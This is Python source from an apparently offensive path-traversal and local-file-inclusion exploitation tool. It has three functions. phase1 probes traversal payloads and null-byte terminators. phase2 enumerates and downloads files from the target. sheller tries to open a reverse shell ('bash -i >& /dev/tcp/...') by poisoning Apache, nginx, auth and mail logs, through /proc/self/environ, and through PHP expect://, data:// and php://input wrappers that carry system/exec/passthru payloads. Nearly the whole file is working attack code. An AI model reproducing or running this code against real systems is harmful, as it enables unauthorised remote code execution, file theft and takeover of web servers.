def sheller( technique, attack, url, url2, keyword, cookie, selected, verbose, paylist, nullist, wlist, authcookie, post_data, depth, gui, app ): """ second exploitation module: try to gain a reverse shell over the system @params: technique - technique index (see variables.rce) """ # TODO clean me up url = fix_url(url, attack) s = session() timeout = vars.timeout success = None print( color.RD+"[INFO]" + color.O + " RCE" + color.END + color.RD + "|" + color.END + " " + color.RC + "Using Technique:" + color.END + color.O + "" + str(rce[technique]) + color.END ) if gui: gui.crawlerResultDisplay.append( "[Info] RCE| Using Technique: {}".format( str(rce[technique]) ) ) gui.show() app.processEvents() if technique == 1: file = "/proc/self/environ" elif technique == 2: file = "/var/log/apache2/access.log" elif technique == 3: file = "/var/log/auth.log" elif technique == 4: file = "/var/mail/www-data" elif technique == 5: file = "/var/log/nginx/access.log" elif technique == 6: success = ["something here"] if authcookie != "": tmpjar = cookie_from_file(authcookie) for cookie in tmpjar: s.cookies.set_cookie(cookie) con2, con3 = initial_ping( s, attack, url, url2, keyword, timeout, ) if technique != 6: sys.stdout.write("{0} └── Looking for Log File:{1}".format( color.RD, color.END )) for i in paylist: d = 1 while d <= depth: traverse = "" j = 1 # chain traversal payloads while j <= d: traverse += i j += 1 # send attack requests - no nullbyte injection requestlist = [] for prefix in wlist: combined = prefix + traverse if nullist == []: try: requestlist += attack_request( s, attack, url, url2, keyword, selected, combined, file, "", "", post_data, timeout, sheller=True, ) except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) else: for nb in nullist: try: requestlist += attack_request( s, attack, url, url2, keyword, selected, combined, file, "", nb, post_data, timeout, sheller=True, ) except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) continue # analyze result found = False for (r, p, nb, data, traverse) in requestlist: if attack == 3: s.cookies.set(selected, p) if str(r.status_code).startswith("2"): if ( filecheck(r, con2, con3, p) and attack != 4 or filecheck(r, con2, con3, p, post=True) and attack == 4 ): success = (r, p, nb, data, traverse) found = True break if verbose: if attack == 1 or attack == 2: print(color.END + "{}|: ".format( r.status_code) + r.url ) elif attack == 3 or attack == 4: print(color.END + "{}|: ".format( r.status_code)+r.url + " : " + p ) d += 1 if found: sys.stdout.write( "{0} OK {2}|{1}\n".format( color.O, color.END, color.END + color.RD ) ) break if success: PAYLOAD = "bash -i >& /dev/tcp/{}/{} 0>&1".format( vars.LISTENIP, vars.LISTENPORT, ) if technique != 6: if attack == 1: prep = query( success[4], "", file, success[2], keyword, url, url2, s, )[0] elif attack == 2: prep = inpath( success[4], "", file, success[2], url, url2, s, )[0] elif attack == 3: s.cookies.set(selected, success[1]) req = requests.Request(method="GET", url=url) prep = s.prepare_request(req) elif attack == 4: req = requests.Request( method="POST", url=url, data=success[3] ) prep = s.prepare_request(req) new_body = unquote(prep.body) prep.body = new_body prep.headers["content-length"] = len(new_body) if technique == 1: prep.headers[ "User-agent" ] = '<?php system("{}"); ?>'.format(PAYLOAD) sys.stdout.write("{0} : Trying system():{1} ".format( color.RD, color.END )) if gui: gui.crawlerResultDisplay.append( " : Trying {}".format("system(): ") ) gui.show() app.processEvents() try: s.send(prep, timeout=timeout) show_status(gui) if app: app.processEvents() except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError, ): show_status(gui, timeout=True) if app: app.processEvents() prep.headers[ "User-agent" ] = '<?php exec("{}"); ?>'.format(PAYLOAD) sys.stdout.write("{0} : Trying exec():{1} ".format( color.RD, color.END, )) if gui: gui.crawlerResultDisplay.append( " : Trying {}".format("exec(): ") ) gui.show() app.processEvents() try: s.send(prep, timeout=timeout) show_status(gui) if app: app.processEvents() except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError ): show_status(gui, timeout=True) if app: app.processEvents() prep.headers[ "User-agent" ] = '<?php passthru("{}"); ?>'.format(PAYLOAD) sys.stdout.write("{0} : Trying passthru():{1} ".format( color.RD, color.END )) if gui: gui.crawlerResultDisplay.append( " : Trying {}".format("passthru(): ") ) gui.show() app.processEvents() try: s.send(prep, timeout=timeout) show_status(gui) if app: app.processEvents() except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError, ): show_status(gui, timeout=True) if app: app.processEvents() elif technique == 2 or technique == 5: req = requests.Request(method="GET", url=url) prep2 = s.prepare_request(req) prep2.url = url + "/" + '<?php system("{}"); ?>'.format(PAYLOAD) sys.stdout.write("{0} : Trying system():{1} ".format( color.RD, color.END, )) if gui: gui.crawlerResultDisplay.append( " : Trying {}".format("system(): "), ) gui.show() app.processEvents() try: s.send(prep2, timeout=timeout) s.send(prep, timeout=timeout) show_status(gui) if app: app.processEvents() except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError, ): show_status(gui, timeout=True) if app: app.processEvents() prep2.url = url + "/" + '<?php exec("{}"); ?>'.format(PAYLOAD) sys.stdout.write( "{0} : Trying exec():{1} ".format( color.RD, color.END ) ) if gui: gui.crawlerResultDisplay.append( " : Trying {}".format("exec(): ") ) gui.show() app.processEvents() try: s.send(prep2, timeout=timeout) s.send(prep, timeout=timeout) show_status(gui) if app: app.processEvents() except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError, ): show_status(gui, timeout=True) if app: app.processEvents() prep2.url = url + "/" + '<?php passthru("{}"); ?>'.format(PAYLOAD) sys.stdout.write("{0} : Trying passthru(): {1}".format( color.RD, color.END )) if gui: gui.crawlerResultDisplay.append( " : Trying {}".format("passthru(): ") ) gui.show() app.processEvents() try: s.send(prep2, timeout=timeout) s.send(prep, timeout=timeout) show_status(gui) if app: app.processEvents() except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError, ): show_status(gui, timeout=True) if app: app.processEvents() elif technique == 3: tmp = url.split("://")[1] if "@" in tmp: tmp = tmp.split("@")[1] host = tmp.split("/")[0].split(":")[0] sshs = [ '<?php system("{}"); ?>@{}'.format(PAYLOAD, host), '<?php exec("{}"); ?>@{}'.format(PAYLOAD, host), '<?php passthru("{}"); ?>@{}'.format(PAYLOAD, host) ] ssht = [ "system(): ", "exec(): ", "passthru(): " ] for i in range(0, len(sshs)): sys.stdout.write("{0} : Trying {2}{1}".format( color.RD, color.END, ssht[i] )) if gui: gui.crawlerResultDisplay.append( " : Trying {}".format(ssht[i]) ) gui.show() app.processEvents() try: if is_windows: subprocess.run( ["putty.exe", "-ssh", sshs[i]] ) else: subprocess.run(["ssh", sshs[i]]) except Exception as e: show_status(gui, exception=e) if app: app.processEvents() try: s.send(prep, timeout=timeout) show_status(gui) if app: app.processEvents() except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError, ): show_status(gui, timeout=True) if app: app.processEvents() elif technique == 4: tmp = url.split("://")[1] if "@" in tmp: tmp = tmp.split("@")[1] topics = [ 'I<3shells <?php system("{}"); ?>'.format(PAYLOAD), 'I<3shells <?php exec("{}"); ?>'.format(PAYLOAD), 'I<3shells <?php passthru("{}"); ?>'.format(PAYLOAD) ] topict = [ "system(): ", "exec(): ", "passthru(): " ] host = tmp.split("/")[0].split(":")[0] for i in range(0, len(topics)): sys.stdout.write("{0} : Trying {2}{1}".format( color.RD, color.END, topict[i] )) if gui: gui.crawlerResultDisplay.append( " : Trying {}".format(topict[i]) ) gui.show() app.processEvents() try: p = subprocess.Popen( ["echo", "Uno reverse shell"], stdout=subprocess.PIPE, ) subprocess.call( [ "mail", "-s", topics[i], "www-data@{}".format(host) ], stdin=p.stdout, ) except Exception as e: show_status(gui, exception=e) if app: app.processEvents() try: s.send(prep, timeout=timeout) show_status(gui) if app: app.processEvents() except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError ): show_status(gui, timeout=True) if app: app.processEvents() elif technique == 6: wrappersPart1 = [ 'expect://{}'.format(PAYLOAD), 'data://text/plain,<?php system' '("{}"); ?>'.format(PAYLOAD), 'data://text/plain,<?php exec' '("{}"); ?>'.format(PAYLOAD), 'data://text/plain,<?php passthru' '("{}"); ?>'.format(PAYLOAD), 'data://text/plain;base64,' + encode64( '<?php system("{}"); ?>'.format(PAYLOAD) ), 'data://text/plain;base64,' + encode64( '<?php exec("{}"); ?>'.format(PAYLOAD) ), 'data://text/plain;base64,' + encode64( '<?php passthru("{}"); ?>'.format(PAYLOAD) ) ] namesPart1 = [ "expect: ", "data.system(): ", "data.exec(): ", "data.passthru(): ", "data.b64.system(): ", "data.b64.exec(): ", "data.b64.passthru(): " ] for i in range(0, len(wrappersPart1)): wrapper = wrappersPart1[i] sys.stdout.write("{0} : {2}{1}".format( color.RD, color.END, namesPart1[i] )) if gui: gui.crawlerResultDisplay.append( " : {}".format(namesPart1[i]) ) gui.show() app.processEvents() if attack == 1: prep = query( "", "", wrapper, "", keyword, url, url2, s )[0] elif attack == 2: prep = inpath("", "", wrapper, "", url, url2, s)[0] elif attack == 3: s.cookies.set(selected, wrapper) req = requests.Request(method="GET", url=url) prep = s.prepare_request(req) elif attack == 4: req = requests.Request( method="POST", url=url, data=wrapper, ) prep = s.prepare_request(req) new_body = unquote(prep.body) prep.body = new_body prep.headers["content-length"] = len(new_body) try: s.send(prep, timeout=timeout) show_status(gui) if app: app.processEvents() except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError ): show_status(gui, timeout=True) if app: app.processEvents() wrapper = "php://input" payloads = [ '<?php system("{}"); ?>'.format(PAYLOAD), '<?php exec("{}"); ?>'.format(PAYLOAD), '<?php passthru("{}"); ?>'.format(PAYLOAD) ] names = [ "php input.system(): ", "php input.exec(): ", "php input.passthru(): " ] for i in range(0, len(payloads)): sys.stdout.write("{0} : {2}{1}".format( color.RD, color.END, names[i] )) if gui: gui.crawlerResultDisplay.append( " : Trying {}".format(names[i]) ) gui.show() app.processEvents() if attack == 1: if "?" not in url: cont = "?" + keyword + "=" + wrapper + url2 else: cont = "&" + keyword + "=" + wrapper + url2 req = requests.Request( method="POST", url=url + cont, data=payloads[i] ) prep = s.prepare_request(req) elif attack == 3: s.cookies.set(selected, wrapper) req = requests.Request( method="POST", url=url + cont, data=payloads[i] ) prep = s.prepare_request(req) else: prep = None if prep: try: s.send(prep, timeout=timeout) show_status(gui) if app: app.processEvents() except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError ): show_status(gui, timeout=True) if app: app.processEvents() else: show_status( gui, exception="Attack vector not supported." ) if app: app.processEvents() else: sys.stdout.write("{0} FAIL{2}|{1}\n".format( color.O, color.END, color.END + color.RD )) if gui: gui.crawlerResultDisplay.append(" FAIL\n") gui.show() app.processEvents()
def phase2( attack, url, url2, keyword, cookie, selected, filespath, dirs, depth, verbose, dl, selected_payloads, selected_nullbytes, selected_prefixes, authcookie, post_data, dirlen, gui ): """ [Phase 2]: Exploitation @params: attack - attack mode url - target part 1 url2 - target part 2 keyword - -p PAM (only for -a 1) cookie - cookiejar for -a 3 selected - selected cookie to be poisoned filespath - file list dirs - directory list depth - attack depth verbose - print 404s? dl - download found files? selected_payloads - payloads selected in phase 1 selected_nullbytes - terminators selected in phase 1 selected_prefixes - PHP wrappers selected in phase 1 authcookie - Authentication Cookie File post_data - POST Data for --attack 4 dirlen - directory dictionary size (after permutations) gui - GUI frame to set the graphical progress bar """ # variables for the progress counter global request_count timeout = vars.timeout fileslen = sum(1 for dummy in filegen(filespath)) if len(selected_nullbytes) == 0: total_requests = len(selected_payloads) * fileslen * dirlen * depth else: total_requests = len(selected_payloads) * len(selected_nullbytes) total_requests = total_requests * fileslen * dirlen * depth total_requests *= len(selected_prefixes) if gui: lock.acquire() try: gui.progressBar.reset() gui.progressBar.setMinimum(0) gui.progressBar.setMaximum(total_requests) finally: lock.release() url = fix_url(url, attack) # initialize lists & session found = [] urls = [] s = session() if authcookie != "": tmpjar = cookie_from_file(authcookie) for cookie in tmpjar: s.cookies.set_cookie(cookie) con2, con3 = initial_ping(s, attack, url, url2, keyword, timeout) try: for dir in dirs: files = filegen(filespath) for file in files: d = 1 while d <= depth: for i in selected_payloads: traverse = "" j = 1 # chain traversal payloads while j <= d: traverse += i j += 1 # send attack requests - with or without # nullbyte injection requestlist = [] for prefix in selected_prefixes: combined = prefix + traverse if selected_nullbytes == []: try: requestlist += attack_request( s, attack, url, url2, keyword, selected, combined, file, dir, "", post_data, timeout, phase2=True, ) except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) continue else: for nb in selected_nullbytes: try: requestlist += attack_request( s, attack, url, url2, keyword, selected, combined, file, dir, nb, post_data, timeout, phase2=True, ) except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) continue # analyze result for (r, p, data) in requestlist: lock.acquire() try: request_count += 1 if gui: progress_gui( request_count, total_requests, gui, ) else: if is_windows: if request_count % 1000 == 0: progress_win( request_count, total_requests, prefix=" ", suffix=" ", ) else: progress( request_count, total_requests, prefix=" ", suffix=" ", ) finally: lock.release() vfound = False if str(r.status_code).startswith("2"): if ( filecheck(r, con2, con3, p) and attack != 4 or filecheck(r, con2, con3, p, post=True) and attack == 4 ): vfound = True if attack == 1 or attack == 2: print( color.RD+"[INFO]" + color.O + " leak" + color.END + " " + color.RD + "statvs-code" + color.END + "=" + color.O + str(r.status_code) + color.END + " " + color.R + "site" + color.END + "=" + r.url ) if dl and dir + file not in found: download( r.url, dir + file, cookie=s.cookies, ) found.append(dir + file) if attack == 1: urls.append( color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + r.url.split( keyword + "=" )[1].replace(url2, "")) else: vlnlist = r.url.split("/")[1::] vlnpath = ( "/".join(i for i in vlnlist) ).replace(url2, "") urls.append( color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + vlnpath ) elif attack == 3: s.cookies.set(selected, p) print( color.RD + "[INFO]" + color.O + " leak" + color.END + " " + color.RD + "statvs-code" + color.END + "=" + color.O + str(r.status_code) + color.END + " " + color.R + "cookie" + color.END + "=" + p ) if dl and dir + file not in found: download( r.url, dir + file, cookie=s.cookies, ) found.append(dir + file) urls.append( color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + p ) elif attack == 4: print( color.RD + "[INFO]" + color.O + " leak" + color.END + " " + color.RD + "statvs-code" + color.END + "=" + color.O + str(r.status_code) + color.END + " " + color.R + "post_data" + color.END + "=" + p ) if dl and dir + file not in found: download( r.url, dir + file, cookie=s.cookies, post=data, ) found.append(dir + file) urls.append( color.RD + "[pl]" + color.END + color.O + " " + str(r.status_code) + color.END + " " + p ) if verbose and not vfound: if attack == 1 or attack == 2: print(color.END + "{}|: ".format( r.status_code) + r.url, ) elif attack == 3 or attack == 4: print(color.END + "{}|: ".format( r.status_code) + r.url + " : " + p ) d += 1 return (found, urls) except KeyboardInterrupt: return (found, urls)
def phase1( attack, url, url2, keyword, cookie, selected, verbose, depth, paylist, file, authcookie, post_data, gui ): """ [Phase 1]: Vulnerability Analysis @params: attack - attack mode (-a ACK) url - target part 1 (-v VIC) url2 - target part 2 (-q VIC2) keyword - -p PAM (only for -a 1) cookie - cookiejar for -a 3 selected - selected cookie to be poisoned verbose - print 404s? depth - attack depth (-d INT) paylist - payload list (all) file - file to be looked up (-i FIL, default: /etc/passwd) authcookie - Authentication Cookie File to bypass Login Screens post_data - POST Data for --attack 4 gui - GUI frame to set the graphical progress bar """ # variables for the progress counter global request_count precise = vars.precise prefixes = [""] if vars.lfi: prefixes += phase1_wrappers total_requests = len(payloadlist) * (len(nullchars) + 1) * len(prefixes) if not precise: total_requests = total_requests * (depth) timeout = vars.timeout if gui: lock.acquire() try: gui.progressBar.reset() gui.progressBar.setMinimum(0) gui.progressBar.setMaximum(total_requests) finally: lock.release() url = fix_url(url, attack) # initialize lists & session payloads = [] nullbytes = [] found_prefixes = [] s = session() if authcookie != "": tmpjar = cookie_from_file(authcookie) for cookie in tmpjar: s.cookies.set_cookie(cookie) con2, con3 = initial_ping(s, attack, url, url2, keyword, timeout) for i in paylist: if precise: layers = [depth] else: layers = list(range(1, depth + 1)) for d in layers: traverse = "" j = 1 # chain traversal payloads while j <= d: traverse += i j += 1 # send attack requests - no nullbyte injection requestlist = [] for prefix in prefixes: combined = prefix + traverse try: requestlist += attack_request( s, attack, url, url2, keyword, selected, combined, file, "", "", post_data, timeout, w=prefix, ) except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) # repeat for nullbytes for nb in nullchars: try: requestlist += attack_request( s, attack, url, url2, keyword, selected, combined, file, "", nb, post_data, timeout, w=prefix, ) except ( requests.exceptions.Timeout, requests.exceptions.ConnectionError ): print("Timeout reached for " + url) # analyze result found = False for (r, p, nb, w) in requestlist: lock.acquire() try: request_count += 1 if gui: progress_gui(request_count, total_requests, gui) else: if is_windows: if request_count % 1000 == 0: progress_win( request_count, total_requests, prefix=" ", suffix=" ", ) else: progress( request_count, total_requests, prefix=" ", suffix=" ", ) finally: lock.release() if str(r.status_code).startswith("2"): if ( filecheck(r, con2, con3, p) and attack != 4 or filecheck(r, con2, con3, p, post=True) and attack == 4 ): payloads.append(i) if nb != "": nullbytes.append(nb) if w != "": found_prefixes.append(w) found = True out = color.RD + "[pl]" + color.END + color.O out = out + " " + str(r.status_code) + color.END + " " out = out + "{0:{1}}".format(i, maxlen) + " " out = out + "{0:{1}}".format(nb, nullen) + " " + w print(out) if verbose and not found: if attack == 1 or attack == 2: print(color.END + "{}|: ".format(r.status_code)+r.url) elif attack == 3 or attack == 4: print(color.END + "{}|: ".format( r.status_code)+r.url + " : " + p ) if found: break return (payloads, nullbytes, found_prefixes)